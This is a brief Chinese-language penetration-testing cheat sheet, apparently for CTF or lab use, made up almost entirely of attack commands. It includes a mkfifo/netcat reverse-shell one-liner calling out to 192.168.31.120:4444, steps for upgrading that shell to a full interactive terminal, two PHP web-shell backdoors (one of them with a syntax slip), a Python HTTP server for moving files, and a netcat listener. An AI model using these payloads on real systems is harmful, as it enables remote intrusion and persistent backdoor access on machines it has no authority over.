网络攻防实战 cheatsheet

使用 python 或 script 提升反弹 shell 交互性

许多反弹 shell 缺乏完整的终端功能，可以通过调用 Python 的 pty 模块或 script 命令来创建伪终端，支持方向键和历史命令：

# 在反弹 shell 中执行以下命令
python -c 'import pty; pty.spawn("/bin/bash")'  # Python 2/3 通用
# 或使用 script 命令（部分系统支持）
script /dev/null  # 创建伪终端会话

执行后，按 Ctrl+Z 将当前会话挂起，在本地终端执行：

stty raw -echo; fg  # 将终端模式切换为原始模式并恢复会话

从蚁剑终端的反弹 shell 到本地终端的反弹 shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.31.120 4444 >/tmp/f

PHP 木马

<?php system($_GET["cmd"]; ?> 

<?php eval($_POST['cmd']); ?>

反弹 shell

https://github.com/security-cheatsheet/reverse-shell-cheatsheet

http 传输服务

python -m http.server 8000

监听端口

nc -lvp 4444